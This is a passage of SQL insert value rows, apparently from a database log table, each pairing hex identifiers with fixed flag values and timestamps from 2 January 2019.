(45558, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 03:07:17'),
(45559, '69ef35d4c5ddd782dfa7278b2541a2c3', '3683b4ef9710cce8', 0, 2, 1, '2019-01-02 03:14:25'),
(45560, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 03:26:08'),
(45561, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 03:26:53'),
(45562, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:36:32'),
(45563, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:36:39'),
(45564, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:37:00'),
(45565, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:40:16'),
(45566, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:40:37'),
(45567, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:40:56'),
(45568, '8c77e549d5555aa1312f83bc58563b49', '4d429c29f879c753', 0, 2, 1, '2019-01-02 04:41:16'),
(45569, '34103706175e029fe8b312b5370cecd4', 'ed208305744211bb', 0, 2, 1, '2019-01-02 04:48:49'),
(45570, '34103706175e029fe8b312b5370cecd4', 'ed208305744211bb', 0, 2, 1, '2019-01-02 04:49:33'),
(45571, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 05:35:32'),
(45572, '40c9106a73fd119ed92d81c48654d9f5', '6092d6c1cb041b23', 0, 2, 1, '2019-01-02 05:37:23'),
(45573, '6094364214284e380b4a02cc0e1564d7', '2180478c5d1dcafd', 0, 2, 1, '2019-01-02 06:16:38'),
(45574, '14b08d91d2b1f37e39a66b6782f1badf', '322e2a45b77032c6', 0, 2, 1, '2019-01-02 06:41:31'),
(45575, '14b08d91d2b1f37e39a66b6782f1badf', '322e2a45b77032c6', 0, 2, 1, '2019-01-02 06:42:07'),
(45576, '14b08d91d2b1f37e39a66b6782f1badf', '322e2a45b77032c6', 0, 2, 1, '2019-01-02 06:42:18'),
(45577, '0ad997dc26c0673f95fd3e55eb502cf0', '33838d77ff15a692', 0, 2, 1, '2019-01-02 07:53:02'),
(45578, '36dc60c1d5730de1302bd4eb95649723', '8d560ad7723df7f0', 0, 2, 1, '2019-01-02 08:07:09'),
(45579, '8119be8203f56f53ba443b0bd40313a0', 'f9e534212da14f2f', 0, 2, 1, '2019-01-02 08:08:35'),
(45580, '36dc60c1d5730de1302bd4eb95649723', '8d560ad7723df7f0', 0, 2, 1, '2019-01-02 08:11:33'),
(45581, '36dc60c1d5730de1302bd4eb95649723', '8d560ad7723df7f0', 0, 2, 1, '2019-01-02 08:13:17'),
(45582, '2987ef5c3a93810685e1d6d593466a05', '89f6a3f52ab752cf', 0, 2, 1, '2019-01-02 08:43:53'),
(45583, 'f3c99c854fe0d59b3b9da70791ccc32a', '1c88787793466b5b', 0, 2, 1, '2019-01-02 09:52:51'),
(45584, '2a006d5be1e035fa5d0c46927deef233', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-02 11:17:40'),
(45585, 'b33fcd087370ef4e30232be3c31702d3', '5fd46984da6363e6', 0, 2, 1, '2019-01-02 11:30:02'),
(45586, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 11:42:50'),
(45587, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 11:43:25'),
(45588, 'acafc7169692d379e03068518c457499', '09efcb8d7bf145dc', 0, 2, 1, '2019-01-02 12:25:46'),
(45589, 'acafc7169692d379e03068518c457499', '09efcb8d7bf145dc', 0, 2, 1, '2019-01-02 12:26:08'),
(45590, 'acafc7169692d379e03068518c457499', '09efcb8d7bf145dc', 0, 2, 1, '2019-01-02 12:34:12'),
(45591, 'acafc7169692d379e03068518c457499', '09efcb8d7bf145dc', 0, 2, 1, '2019-01-02 12:38:12'),
(45592, 'd555b0c46b8de32cb09c086d9b58841b', '22905843105c275f', 0, 2, 1, '2019-01-02 12:53:13'),
(45593, '2e0a8554b8f298d613b37561c235547a', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-02 13:00:04'),
(45594, '2e0a8554b8f298d613b37561c235547a', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-02 13:00:24'),
(45595, '15b4e81c96c54a05e545e3cc9302830e', 'f23e16a0f35a2c48', 0, 2, 1, '2019-01-02 13:05:47'),
(45596, '610df4d9a4fa56a097c5a819d9cfdcf3', 'fa712c17b68709a5', 0, 2, 1, '2019-01-02 13:17:09'),
(45597, '2e0a8554b8f298d613b37561c235547a', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-02 13:20:02'),
(45598, '2e0a8554b8f298d613b37561c235547a', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-02 13:22:53'),
(45599, 'cf91b92ad7a9d345d7e7174ac6521b7d', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 13:24:17'),
(45600, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2019-01-02 13:29:42'),
(45601, 'cf91b92ad7a9d345d7e7174ac6521b7d', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 13:31:36'),
(45602, '9883172dd04bc1c2d3ada4db813a2ec8', '7c5bcf99f2070582', 0, 2, 1, '2019-01-02 13:35:40'),
(45603, '63c15a937e6b8f0f96adf5c612fb81b0', '624d6937076d1188', 0, 2, 1, '2019-01-02 13:54:27'),
(45604, '023545b663003e54744646e5ac1ac7e5', 'f9bf8394ab693a83', 0, 2, 1, '2019-01-02 13:55:54'),
(45605, 'ea5f33fcb676e79ff8cb0eda772abe43', '22905843105c275f', 0, 2, 1, '2019-01-02 13:58:40'),
(45606, 'ea5f33fcb676e79ff8cb0eda772abe43', '22905843105c275f', 0, 2, 1, '2019-01-02 13:59:12'),
(45607, 'ea5f33fcb676e79ff8cb0eda772abe43', '22905843105c275f', 0, 2, 1, '2019-01-02 14:00:15'),
(45608, 'ea5f33fcb676e79ff8cb0eda772abe43', '22905843105c275f', 0, 2, 1, '2019-01-02 14:03:27'),
(45609, 'ea5f33fcb676e79ff8cb0eda772abe43', '22905843105c275f', 0, 2, 1, '2019-01-02 14:09:14'),
(45610, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 14:11:52'),
(45611, 'a26258ddeb381f2ab02dd281e11214a5', '0633370a0f169097', 0, 2, 1, '2019-01-02 14:17:10'),
(45612, 'a26258ddeb381f2ab02dd281e11214a5', '0633370a0f169097', 0, 2, 1, '2019-01-02 14:17:49'),
(45613, '058aa019b09e53f2f0af79d23e5bf776', '986ab564e02c3805', 0, 2, 1, '2019-01-02 14:32:44'),
(45614, '058aa019b09e53f2f0af79d23e5bf776', '986ab564e02c3805', 0, 2, 1, '2019-01-02 14:32:52'),
(45615, '058aa019b09e53f2f0af79d23e5bf776', '986ab564e02c3805', 0, 2, 1, '2019-01-02 14:33:05'),
(45616, '058aa019b09e53f2f0af79d23e5bf776', '986ab564e02c3805', 0, 2, 1, '2019-01-02 14:33:17'),
(45617, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 14:35:10'),
(45618, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:56:06'),
(45619, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:56:32'),
(45620, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:56:45'),
(45621, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:56:50'),
(45622, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:57:35'),
(45623, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:57:40'),
(45624, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 14:58:14'),
(45625, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 15:01:58'),
(45626, '4e46a68d42e6a0c109a0b540ddf3139d', 'fd93b689776c47a8', 0, 2, 1, '2019-01-02 15:02:15'),
(45627, 'a392a43998036df43d73481a9e397325', 'dae1439b1dde6323', 0, 2, 1, '2019-01-02 15:21:05'),
(45628, 'f73af3a558b27ad8a4a60a6ccb56cc6b', '2034f09284a4c7ca', 0, 2, 1, '2019-01-02 15:22:50'),
(45629, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:36:02'),
(45630, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 15:36:13'),
(45631, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:36:40'),
(45632, 'c38379ad31ae0d9152364f1cba2892dd', 'dace6e0c219330fc', 0, 2, 1, '2019-01-02 15:38:20'),
(45633, '94bc7c48073853d95fd91aaa3ad6ee07', 'df27b9a2919a8206', 0, 2, 1, '2019-01-02 15:45:35'),
(45634, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:45:44'),
(45635, '94bc7c48073853d95fd91aaa3ad6ee07', 'df27b9a2919a8206', 0, 2, 1, '2019-01-02 15:46:07'),
(45636, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:48:36'),
(45637, 'e28635f5e8003fac87139400ff6ed80a', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-02 15:49:59'),
(45638, '16314a1440d421ec91ed5b4d4ccb6ca6', '32b169e936bbe5df', 0, 2, 1, '2019-01-02 15:55:18'),
(45639, '94bc7c48073853d95fd91aaa3ad6ee07', 'df27b9a2919a8206', 0, 2, 1, '2019-01-02 15:55:27'),
(45640, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:55:28'),
(45641, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:55:43'),
(45642, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:56:01'),
(45643, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 15:56:55'),
(45644, '16314a1440d421ec91ed5b4d4ccb6ca6', '32b169e936bbe5df', 0, 2, 1, '2019-01-02 15:57:16'),
(45645, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:57:27'),
(45646, '94bc7c48073853d95fd91aaa3ad6ee07', 'df27b9a2919a8206', 0, 2, 1, '2019-01-02 15:58:00'),
(45647, 'c38379ad31ae0d9152364f1cba2892dd', 'dace6e0c219330fc', 0, 2, 1, '2019-01-02 15:58:10'),
(45648, 'eb5947453a2ac636c151d7f577d4928d', 'f168d960726337a6', 0, 2, 1, '2019-01-02 15:58:42'),
(45649, 'e877aa58505fd9e1775bea8bdba2a612', '2c734180cc14a052', 0, 2, 1, '2019-01-02 15:58:59'),
(45650, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 15:59:43'),
(45651, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 15:59:50'),
(45652, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 15:59:51'),
(45653, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 15:59:58'),
(45654, 'e877aa58505fd9e1775bea8bdba2a612', '2c734180cc14a052', 0, 2, 1, '2019-01-02 16:00:37'),
(45655, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 16:00:39'),
(45656, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 16:01:32'),
(45657, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 16:02:14'),
(45658, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-02 16:02:24'),
(45659, '16314a1440d421ec91ed5b4d4ccb6ca6', '32b169e936bbe5df', 0, 2, 1, '2019-01-02 16:02:29'),
(45660, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 16:02:46'),
(45661, 'e877aa58505fd9e1775bea8bdba2a612', '2c734180cc14a052', 0, 2, 1, '2019-01-02 16:03:26'),
(45662, 'a77412d074d8d79b9a3a922e5f82bac6', 'cad202a09758cb3a', 0, 2, 1, '2019-01-02 16:03:31'),
(45663, '499ca73b2b9993687d6aa65073c1439c', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-02 16:03:48'),
(45664, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 16:04:34'),
(45665, '9a25703579b2cfbc32bd793c83e493e8', '14d059e5da6bdba4', 0, 2, 1, '2019-01-02 16:04:37'),
(45666, '9a25703579b2cfbc32bd793c83e493e8', '14d059e5da6bdba4', 0, 2, 1, '2019-01-02 16:05:01'),
(45667, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 16:05:02'),
(45668, 'fde2d37cbfadb01287ba1c83cf75bfa3', '37074bf1993865d0', 0, 2, 1, '2019-01-02 16:05:23'),
(45669, '499ca73b2b9993687d6aa65073c1439c', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-02 16:05:30'),
(45670, 'e5ce91f2dfcf4eba342f9ffbfe0d7ea8', 'abc5ec7aefe03208', 0, 2, 1, '2019-01-02 16:05:46'),
(45671, '9a25703579b2cfbc32bd793c83e493e8', '14d059e5da6bdba4', 0, 2, 1, '2019-01-02 16:05:48'),
(45672, 'e5ce91f2dfcf4eba342f9ffbfe0d7ea8', 'abc5ec7aefe03208', 0, 2, 1, '2019-01-02 16:06:50'),
(45673, 'f56719d99f1ffa2cc76fc136c867314e', '8b67051b42687f96', 0, 2, 1, '2019-01-02 16:07:49'),
(45674, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 16:08:24'),
(45675, 'e2e68050ac7e41c19d3f03d3b5b449a4', 'c69b16a8ac60521f', 0, 2, 1, '2019-01-02 16:08:26'),
(45676, 'da9bbdf194c16758b42a112f2866455b', '3e07c8d2cc59ef04', 0, 2, 1, '2019-01-02 16:11:31'),
(45677, 'fe21ffc51cf88ea9ee6a9d93eac61457', 'aaad5edf76870b99', 0, 2, 1, '2019-01-02 16:11:45'),
(45678, 'da9bbdf194c16758b42a112f2866455b', '3e07c8d2cc59ef04', 0, 2, 1, '2019-01-02 16:11:45'),
(45679, 'dd25441d29b3556785df72805ab56292', 'b92ca10776b3225a', 0, 2, 1, '2019-01-02 16:11:51'),
(45680, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2019-01-02 16:12:07'),
(45681, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-02 16:12:38'),
(45682, '7433ff91fa7ad82e8b6a73e7eb2db711', '553b9f0a18b97af8', 0, 2, 1, '2019-01-02 16:14:19'),
(45683, '7433ff91fa7ad82e8b6a73e7eb2db711', '553b9f0a18b97af8', 0, 2, 1, '2019-01-02 16:14:36'),
(45684, 'fc7262370ad2785601b0eec4a079cac1', '7b16863d40230e2a', 0, 2, 1, '2019-01-02 16:14:58'),
(45685, '9a84a0653438d8f94c3ae0bae2af7141', '927c716025ccbd1c', 0, 2, 1, '2019-01-02 16:15:27'),
(45686, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:16:14'),
(45687, '9a25703579b2cfbc32bd793c83e493e8', '14d059e5da6bdba4', 0, 2, 1, '2019-01-02 16:16:31'),
(45688, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:16:41'),
(45689, '3cb55051d18defdd0c0d368353d45f89', '19e548dd12d40585', 0, 2, 1, '2019-01-02 16:16:57'),
(45690, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2019-01-02 16:17:15'),
(45691, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:17:24'),
(45692, '023545b663003e54744646e5ac1ac7e5', 'f9bf8394ab693a83', 0, 2, 1, '2019-01-02 16:17:52'),
(45693, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:18:02'),
(45694, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:18:30'),
(45695, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:18:38'),
(45696, 'a8ce24bf5f370b446d87ae318fd610e8', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 16:19:01'),
(45697, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:19:15'),
(45698, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:19:25'),
(45699, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:19:43'),
(45700, '3cb55051d18defdd0c0d368353d45f89', '19e548dd12d40585', 0, 2, 1, '2019-01-02 16:20:41'),
(45701, 'ba37e212890b6a46a7825f515a472a55', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-02 16:21:55'),
(45702, '3502c4a009c782cbee92edd9725e674f', '7501b42c35accff7', 0, 2, 1, '2019-01-02 16:22:41'),
(45703, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:25:27'),
(45704, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:25:37'),
(45705, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:27:24'),
(45706, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:28:11'),
(45707, '85eb35a74fc5ae0166551b7df9179c03', 'c451c373ba472410', 0, 2, 1, '2019-01-02 16:28:18'),
(45708, '46120cfa6931c17773a5fa7756a6a452', 'b3dc303f7a11cd2f', 0, 2, 1, '2019-01-02 16:29:53'),
(45709, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-02 16:33:29'),
(45710, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2019-01-02 16:34:43'),
(45711, 'b1e4cff9e503767c6c144b114ea4eedd', '0b1466b4de9b8a16', 0, 2, 1, '2019-01-02 16:36:21'),
(45712, '3bf68dbfe7847a3ef58550f72fb662ed', '1c68b977b911188c', 0, 2, 1, '2019-01-02 16:37:29'),
(45713, '1fa1c34dc6affc25495f0e17c7885525', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2019-01-02 16:41:38'),
(45714, '1fa1c34dc6affc25495f0e17c7885525', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2019-01-02 16:43:05'),
(45715, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 16:43:30'),
(45716, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 16:43:34'),
(45717, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 16:44:37'),
(45718, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 16:45:35'),
(45719, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 16:46:18'),
(45720, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 16:48:23'),
(45721, '36f87a5e4221c972b85e201cf7070590', 'df830820ccabeec3', 0, 2, 1, '2019-01-02 16:48:43'),
(45722, '42d1792338435556f49f34b99d578082', '1de090ec808c88cc', 0, 2, 1, '2019-01-02 16:52:27'),
(45723, '42d1792338435556f49f34b99d578082', '1de090ec808c88cc', 0, 2, 1, '2019-01-02 16:57:18'),
(45724, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 16:59:41'),
(45725, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 16:59:44'),
(45726, '924888bc8bc16ef80756665a559dcb5d', '8a144e5fc2e94311', 0, 2, 1, '2019-01-02 16:59:52'),
(45727, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 16:59:58'),
(45728, 'e8d493e18b2c4ba0fb2bf4ac81978050', 'bfea6206416f4b5a', 0, 2, 1, '2019-01-02 17:00:03'),
(45729, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:00:42'),
(45730, '42d1792338435556f49f34b99d578082', '1de090ec808c88cc', 0, 2, 1, '2019-01-02 17:01:13'),
(45731, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:01:34'),
(45732, '0c9e79338740ccb265641d14710f7499', '0c844fefc01db064', 0, 2, 1, '2019-01-02 17:01:39'),
(45733, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:01:55'),
(45734, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 17:02:04'),
(45735, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2019-01-02 17:02:13'),
(45736, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 17:02:24'),
(45737, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 17:02:34'),
(45738, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:02:37'),
(45739, 'e2e68050ac7e41c19d3f03d3b5b449a4', 'c69b16a8ac60521f', 0, 2, 1, '2019-01-02 17:02:49'),
(45740, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:03:18'),
(45741, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 17:03:19'),
(45742, '1d97f244efe0e3f85a7ed3cbf537415e', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 17:03:30'),
(45743, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:04:54'),
(45744, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:07:57'),
(45745, '783fdf7dd0865af4a244827cb14f9903', 'cc2105dbd92b227a', 0, 2, 1, '2019-01-02 17:08:09'),
(45746, '091bdc10d84ef243f388112dff51ab7d', 'd8923e60c6dca0dc', 0, 2, 1, '2019-01-02 17:09:06'),
(45747, 'b2cbd8207d64bae00396a51377e20380', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-02 17:10:00'),
(45748, 'b2cbd8207d64bae00396a51377e20380', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-02 17:10:25'),
(45749, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 17:10:45'),
(45750, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 17:11:26'),
(45751, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 17:12:30'),
(45752, '0c9e79338740ccb265641d14710f7499', '0c844fefc01db064', 0, 2, 1, '2019-01-02 17:12:55'),
(45753, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:13:09'),
(45754, '65d41c185f7e25984fbee13c26e1652f', 'dcadb578720d99b9', 0, 2, 1, '2019-01-02 17:13:33'),
(45755, 'b2cbd8207d64bae00396a51377e20380', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-02 17:13:55'),
(45756, '65d41c185f7e25984fbee13c26e1652f', 'dcadb578720d99b9', 0, 2, 1, '2019-01-02 17:13:55'),
(45757, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 17:18:48'),
(45758, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:18:51'),
(45759, '932e26a49931c64b3ad73144ce94a658', '77538fba92464324', 0, 2, 1, '2019-01-02 17:19:28'),
(45760, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:20:27'),
(45761, '32de276192491745f095d366d39fcce0', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-02 17:24:02'),
(45762, '053abd0f4d361eba7679a45c07c38e3e', '417b807dff7c6249', 0, 2, 1, '2019-01-02 17:28:23'),
(45763, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:29:18'),
(45764, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 17:31:15'),
(45765, '0e45473ba352eaea2e54414f192002c1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-01-02 17:32:18'),
(45766, '0e45473ba352eaea2e54414f192002c1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-01-02 17:32:26'),
(45767, '513555a1cd53867e9e1534bdc4c01d40', 'f2d0de23e9156f4d', 0, 2, 1, '2019-01-02 17:32:35'),
(45768, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 17:32:40'),
(45769, '3bc423a2ab64356e7ffeaeb7928e48ca', '074ec8007ba74449', 0, 2, 1, '2019-01-02 17:32:45'),
(45770, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:34:23'),
(45771, 'ec4900c2b42ce1c6b8d0536aa36991fd', 'eb1f3b6c48898a3a', 0, 2, 1, '2019-01-02 17:36:38'),
(45772, 'a5ea01e125327747122b77b8be13c80e', 'c020abbb40884763', 0, 2, 1, '2019-01-02 17:37:18'),
(45773, 'a5ea01e125327747122b77b8be13c80e', 'c020abbb40884763', 0, 2, 1, '2019-01-02 17:37:32'),
(45774, '304221538f2207eae732ad62c2962387', 'd01cfc8bff28d321', 0, 2, 1, '2019-01-02 17:38:07'),
(45775, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 17:41:29'),
(45776, 'a77412d074d8d79b9a3a922e5f82bac6', 'cad202a09758cb3a', 0, 2, 1, '2019-01-02 17:45:07'),
(45777, '61fc52c28a337f7bda76fb0b1d9e6493', '19bcc476e66aa8b8', 0, 2, 1, '2019-01-02 17:47:01'),
(45778, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 17:47:14'),
(45779, '61fc52c28a337f7bda76fb0b1d9e6493', '19bcc476e66aa8b8', 0, 2, 1, '2019-01-02 17:47:44'),
(45780, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:48:19'),
(45781, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:48:55'),
(45782, '61fc52c28a337f7bda76fb0b1d9e6493', '19bcc476e66aa8b8', 0, 2, 1, '2019-01-02 17:48:55'),
(45783, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 17:49:40'),
(45784, '4da91e6767a6d35e3b18d3da8ebc7225', '601ff999e03a8543', 0, 2, 1, '2019-01-02 17:51:44'),
(45785, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2019-01-02 17:52:44'),
(45786, '1d97f244efe0e3f85a7ed3cbf537415e', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 17:52:54'),
(45787, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 17:52:57'),
(45788, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 17:52:59'),
